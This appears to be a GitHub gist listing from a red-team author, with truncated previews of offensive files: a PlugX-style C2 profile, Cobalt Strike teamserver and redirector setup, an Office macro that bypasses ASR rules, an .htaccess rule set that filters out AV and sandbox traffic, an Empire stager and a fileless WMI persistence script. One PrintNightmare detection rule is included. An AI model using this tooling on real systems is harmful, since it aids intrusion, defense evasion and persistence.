View plugx.profile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# PlugX Profile | |
# Author: @infosecn1nja | |
# | |
# https://github.com/silence-is-best/c2db/blob/master/README.md | |
set sleeptime "30000"; # use a ~30s delay between callbacks | |
set jitter "10"; # throw in a 10% jitter | |
stage { |
View printernightmare_cve_2021_34527.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
- PrinterNightmare CVE-2021-34527 Exploit Detection | |
- Created by Rahmat Nurfauzi (@infosecn1nja). | |
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2. | |
--> | |
<group name="sysmon,"> | |
<rule id="99948" level="15"> | |
<if_group>sysmon_event_11</if_group> | |
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field> | |
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field> |
View gen-chm.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import argparse | |
import re, random | |
import string, os, os.path | |
def rand_num(min, max): | |
return random.randrange(min, max) | |
def gen_str(size): | |
return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) |
View gist:97b4b2e5132ae9d3d18448b3f7f7aa93
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Make a rule that allows port 80/443 access only from redirector: | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 443 -j DROP | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 80 -j DROP | |
Change default port teamserver : | |
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver |
View gist:04ab2d8ea15f98880bbf7b70168fa3dd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
APT Group/Red Team Weaponization Phase | |
======================================= | |
C2 tools : | |
- Cobalt Strike | |
- Empire | |
- PoshC2 | |
- PupyRAT | |
- Metasploit |
View ASR Rules Bypass.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
View Inject.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
View .htaccess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
# Uncomment the below line for verbose logging, including seeing which rule matched. | |
#LogLevel alert rewrite:trace5 | |
# BURN AV BURN | |
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
RewriteCond expr "-R '52.0.0.0/8'" [OR] |
View wmic_starfighters.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'wmic_xsl_starfighters', | |
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'], |
View WMI-Persistence.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
# https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
<# | |
.SYNOPSIS | |
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
#> | |
$EventFilterName = "Fileless WMI Persistence SystemUptime" |
NewerOlder